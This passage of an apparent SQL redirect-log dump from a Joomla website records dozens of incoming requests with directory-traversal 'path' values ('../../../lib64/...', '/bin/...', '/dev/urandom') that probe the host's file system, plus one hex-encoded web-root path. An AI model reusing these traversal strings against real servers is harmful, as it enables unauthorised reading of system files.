00:00:00',301),(80000,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/new.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fnew.pyc','',1,0,'2026-06-24 18:43:48','0000-00-00 00:00:00',301),(80001,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/importlib/../../audit',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fimportlib%2F..%2F..%2Faudit','',1,0,'2026-06-24 18:43:49','0000-00-00 00:00:00',301),(80002,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/json/../trace.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fjson%2F..%2Ftrace.py','',1,0,'2026-06-24 18:43:50','0000-00-00 00:00:00',301),(80003,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ocartdata3/../../../../dev/urandom',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Focartdata3%2F..%2F..%2F..%2F..%2Fdev%2Furandom','',1,0,'2026-06-24 18:43:51','0000-00-00 00:00:00',301),(80004,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../python3.6/distutils/../../libbasicobjects.so.0.1.0',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpython3.6%2Fdistutils%2F..%2F..%2Flibbasicobjects.so.0.1.0','',1,0,'2026-06-24 18:43:52','0000-00-00 00:00:00',301),(80005,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/tomllib/../../python3.6/../libmcpp.so.0',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Ftomllib%2F..%2F..%2Fpython3.6%2F..%2Flibmcpp.so.0','',1,0,'2026-06-24 18:43:53','0000-00-00 00:00:00',301),(80006,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/bisect.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fbisect.pyo','',1,0,'2026-06-24 18:43:54','0000-00-00 00:00:00',301),(80007,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/linux/../python3.6m/../limits.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Flinux%2F..%2Fpython3.6m%2F..%2Flimits.h','',1,0,'2026-06-24 18:43:55','0000-00-00 00:00:00',301),(80008,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../../lib/python3.12/../udev',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2F..%2Flib%2Fpython3.12%2F..%2Fudev','',1,0,'2026-06-24 18:43:56','0000-00-00 00:00:00',301),(80009,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python3.6/pydoc_data',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython3.6%2Fpydoc_data','',1,0,'2026-06-24 18:43:57','0000-00-00 00:00:00',301),(80010,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../python3.6/distutils/../../gawk',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpython3.6%2Fdistutils%2F..%2F..%2Fgawk','',1,0,'2026-06-24 18:43:58','0000-00-00 00:00:00',301),(80011,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/../nss/../bind',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2F..%2Fnss%2F..%2Fbind','',1,0,'2026-06-24 18:43:59','0000-00-00 00:00:00',301),(80012,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../mysqlclient/../python3.6/../libcom_err.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fpython3.6%2F..%2Flibcom_err.so','',1,0,'2026-06-24 18:44:00','0000-00-00 00:00:00',301),(80013,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/hostid',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fhostid','',1,0,'2026-06-24 18:44:01','0000-00-00 00:00:00',301),(80014,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/linux/../python3.6m/../ext2fs',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Flinux%2F..%2Fpython3.6m%2F..%2Fext2fs','',1,0,'2026-06-24 18:44:02','0000-00-00 00:00:00',301),(80015,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.6/logging/../sqlite3/dbapi2.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.6%2Flogging%2F..%2Fsqlite3%2Fdbapi2.py','',1,0,'2026-06-24 18:44:03','0000-00-00 00:00:00',301),(80016,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/importlib/../../sse2',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fimportlib%2F..%2F..%2Fsse2','',1,0,'2026-06-24 18:44:04','0000-00-00 00:00:00',301),(80017,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../../bin/bashbug-64',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2F..%2Fbin%2Fbashbug-64','',1,0,'2026-06-24 18:44:05','0000-00-00 00:00:00',301),(80018,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../python2.7/../libcom_err.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fpython2.7%2F..%2Flibcom_err.so','',1,0,'2026-06-24 18:44:06','0000-00-00 00:00:00',301),(80019,'http://3s-technologies.com.tr/en/275a9?d=2f686f6d652f6c656462617a61612f7075626c69635f68746d6c2f33732d746563686e6f6c6f676965732e636f6d2e74722f6a6f6f6d6c61',NULL,'','',1,0,'2026-06-24 18:44:07','0000-00-00 00:00:00',301),(80020,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/hostname',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fhostname','',1,0,'2026-06-24 18:44:07','0000-00-00 00:00:00',301),(80021,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/asynchat.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Fasynchat.py','',1,0,'2026-06-24 18:44:08','0000-00-00 00:00:00',301),(80022,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../dovecot/../python3.12/sqlite3/../../libtalloc.so.2',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fdovecot%2F..%2Fpython3.12%2Fsqlite3%2F..%2F..%2Flibtalloc.so.2','',1,0,'2026-06-24 18:44:09','0000-00-00 00:00:00',301),(80023,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/traceback.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Ftraceback.pyo','',1,0,'2026-06-24 18:44:10','0000-00-00 00:00:00',301),(80024,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../lib64/python2.7/../python3.12/uu.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.12%2Fuu.py','',1,0,'2026-06-24 18:44:11','0000-00-00 00:00:00',301),(80025,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/.././../../lib64/python2.7/sqlite3/../../libmcpp.so.0',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.%2F..%2F..%2Flib64%2Fpython2.7%2Fsqlite3%2F..%2F..%2Flibmcpp.so.0','',1,0,'2026-06-24 18:44:12','0000-00-00 00:00:00',301),(80026,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/src/../include/obstack.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fsrc%2F..%2Finclude%2Fobstack.h','',1,0,'2026-06-24 18:44:13','0000-00-00 00:00:00',301),(80027,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/user.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Fuser.pyo','',1,0,'2026-06-24 18:44:14','0000-00-00 00:00:00',301),(80028,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/ast.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fast.py','',1,0,'2026-06-24 18:44:15','0000-00-00 00:00:00',301),(80029,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/funzip',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Ffunzip','',1,0,'2026-06-24 18:44:16','0000-00-00 00:00:00',301),(80030,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/../libauthselect.so.3',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2F..%2Flibauthselect.so.3','',1,0,'2026-06-24 18:44:17','0000-00-00 00:00:00',301),(80031,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../../bin/kill',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2F..%2Fbin%2Fkill','',1,0,'2026-06-24 18:44:18','0000-00-00 00:00:00',301),(80032,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/json/../hashlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fjson%2F..%2Fhashlib.py','',1,0,'2026-06-24 18:44:19','0000-00-00 00:00:00',301),(80033,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python3.6/__phello__.foo.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython3.6%2F__phello__.foo.py','',1,0,'2026-06-24 18:44:20','0000-00-00 00:00:00',301),(80034,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../python2.7/../libblockdev.so.2',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fpython2.7%2F..%2Flibblockdev.so.2','',1,0,'2026-06-24 18:44:21','0000-00-00 00:00:00',301),(80035,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/linux/../python3.6m/../pthread.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Flinux%2F..%2Fpython3.6m%2F..%2Fpthread.h','',1,0,'2026-06-24 18:44:22','0000-00-00 00:00:00',301),(80036,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/mhlib.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Fmhlib.pyc','',1,0,'2026-06-24 18:44:23','0000-00-00 00:00:00',301),(80037,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/concurrent/../../mysqlclient-compat',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fconcurrent%2F..%2F..%2Fmysqlclient-compat','',1,0,'2026-06-24 18:44:24','0000-00-00 00:00:00',301),(80038,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python3.6m/../jerror.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython3.6m%2F..%2Fjerror.h','',1,0,'2026-06-24 18:44:25','0000-00-00 00:00:00',301),(80039,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/basename',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fbasename','',1,0,'2026-06-24 18:44:26','0000-00-00 00:00:00',301),(80040,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../mysqlclient/../python3.6/../mysql',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fpython3.6%2F..%2Fmysql','',1,0,'2026-06-24 18:44:27','0000-00-00 00:00:00',301),(80041,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/tar',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Ftar','',1,0,'2026-06-24 18:44:28','0000-00-00 00:00:00',301),(80042,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/io.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2Fio.py','',1,0,'2026-06-24 18:44:29','0000-00-00 00:00:00',301),(80043,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/test/../pathlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Ftest%2F..%2Fpathlib.py','',1,0,'2026-06-24 18:44:31','0000-00-00 00:00:00',301),(80044,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/popen2.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fpopen2.pyc','',1,0,'2026-06-24 18:44:32','0000-00-00 00:00:00',301),(80045,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/.wp-cli/../../../usr/include/python2.7/structseq.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2F.wp-cli%2F..%2F..%2F..%2Fusr%2Finclude%2Fpython2.7%2Fstructseq.h','',1,0,'2026-06-24 18:44:33','0000-00-00 00:00:00',301),(80046,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../python3.12/wave.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Fpython3.12%2Fwave.py','',1,0,'2026-06-24 18:44:34','0000-00-00 00:00:00',301),(80047,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/telnetlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2Ftelnetlib.py','',1,0,'2026-06-24 18:44:35','0000-00-00 00:00:00',301),(80048,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/json/../simplehttpserver.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fjson%2F..%2FSimpleHTTPServer.pyc','',1,0,'2026-06-24 18:44:36','0000-00-00 00:00:00',301),(80049,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/new.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Fnew.py','',1,0,'2026-06-24 18:44:37','0000-00-00 00:00:00',301),(80050,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../lib64/python2.7/../python3.12/tty.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.12%2Ftty.py','',1,0,'2026-06-24 18:44:38','0000-00-00 00:00:00',301),(80051,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/http',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2Fhttp','',1,0,'2026-06-24 18:44:39','0000-00-00 00:00:00',301),(80052,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/json/../weakref.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fjson%2F..%2Fweakref.py','',1,0,'2026-06-24 18:44:40','0000-00-00 00:00:00',301),(80053,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../lua/../python3.6/weakref.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Flua%2F..%2Fpython3.6%2Fweakref.py','',1,0,'2026-06-24 18:44:41','0000-00-00 00:00:00',301),(80054,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../etc/cl.php.d/../default/../cl.python/../cl.nodejs',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fetc%2Fcl.php.d%2F..%2Fdefault%2F..%2Fcl.python%2F..%2Fcl.nodejs','',1,0,'2026-06-24 18:44:42','0000-00-00 00:00:00',301),(80055,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../apache2/../apache2/../redis',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fapache2%2F..%2Fapache2%2F..%2Fredis','',1,0,'2026-06-24 18:44:43','0000-00-00 00:00:00',301),(80056,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/multipath/../gssproxy/../python3.6/../python3.12/codeop.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fmultipath%2F..%2Fgssproxy%2F..%2Fpython3.6%2F..%2Fpython3.12%2Fcodeop.py','',1,0,'2026-06-24 18:44:44','0000-00-00 00:00:00',301),(80057,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/_abcoll.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2F_abcoll.py','',1,0,'2026-06-24 18:44:45','0000-00-00 00:00:00',301),(80058,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/posixpath.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2Fposixpath.pyc','',1,0,'2026-06-24 18:44:46','0000-00-00 00:00:00',301),(80059,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python3.6/plistlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython3.6%2Fplistlib.py','',1,0,'2026-06-24 18:44:47','0000-00-00 00:00:00',301),(80060,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/cache/./../php/../php/../ssl/../.httprequest/..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fcache%2F.%2F..%2Fphp%2F..%2Fphp%2F..%2Fssl%2F..%2F.HttpRequest%2F..','',1,0,'2026-06-24 18:44:48','0000-00-00 00:00:00',301),(80061,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/.././python2.7/sqlite3/../code.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2F.%2Fpython2.7%2Fsqlite3%2F..%2Fcode.pyc','',1,0,'2026-06-24 18:44:49','0000-00-00 00:00:00',301),(80062,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/./../python2.7/sqlite3/../code.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F.%2F..%2Fpython2.7%2Fsqlite3%2F..%2Fcode.pyc','',1,0,'2026-06-24 18:44:50','0000-00-00 00:00:00',301),(80063,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/.wp-cli/../.wp-cli/../mail/../var/../.httprequest/../.httprequest/../php',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2F.wp-cli%2F..%2F.wp-cli%2F..%2Fmail%2F..%2Fvar%2F..%2F.HttpRequest%2F..%2F.HttpRequest%2F..%2Fphp','',1,0,'2026-06-24 18:44:51','0000-00-00 00:00:00',301),(80064,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/python3.6/sqlite3/../../libmodulemd.so.2',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fpython3.6%2Fsqlite3%2F..%2F..%2Flibmodulemd.so.2','',1,0,'2026-06-24 18:44:52','0000-00-00 00:00:00',301),(80065,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/netinet/../netinet/../python3.6m/..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Fnetinet%2F..%2Fnetinet%2F..%2Fpython3.6m%2F..','',1,0,'2026-06-24 18:44:53','0000-00-00 00:00:00',301),(80066,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../bind/../php',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fbind%2F..%2Fphp','',1,0,'2026-06-24 18:44:54','0000-00-00 00:00:00',301),(80067,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/markupbase.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2Fmarkupbase.pyc','',1,0,'2026-06-24 18:44:55','0000-00-00 00:00:00',301),(80068,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/x11/../apache2/../python2.7/.././../../dev',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2FX11%2F..%2Fapache2%2F..%2Fpython2.7%2F..%2F.%2F..%2F..%2Fdev','',1,0,'2026-06-24 18:44:56','0000-00-00 00:00:00',301),(80069,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../gconv/../apache2/../rpm-plugins/../python2.7/socketserver.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fgconv%2F..%2Fapache2%2F..%2Frpm-plugins%2F..%2Fpython2.7%2FSocketServer.pyo','',1,0,'2026-06-24 18:44:57','0000-00-00 00:00:00',301),(80070,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/src/../bin/../include/malloc.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fsrc%2F..%2Fbin%2F..%2Finclude%2Fmalloc.h','',1,0,'2026-06-24 18:44:58','0000-00-00 00:00:00',301),(80071,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../bind/../python3.6/bdb.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fbind%2F..%2Fpython3.6%2Fbdb.py','',1,0,'2026-06-24 18:44:59','0000-00-00 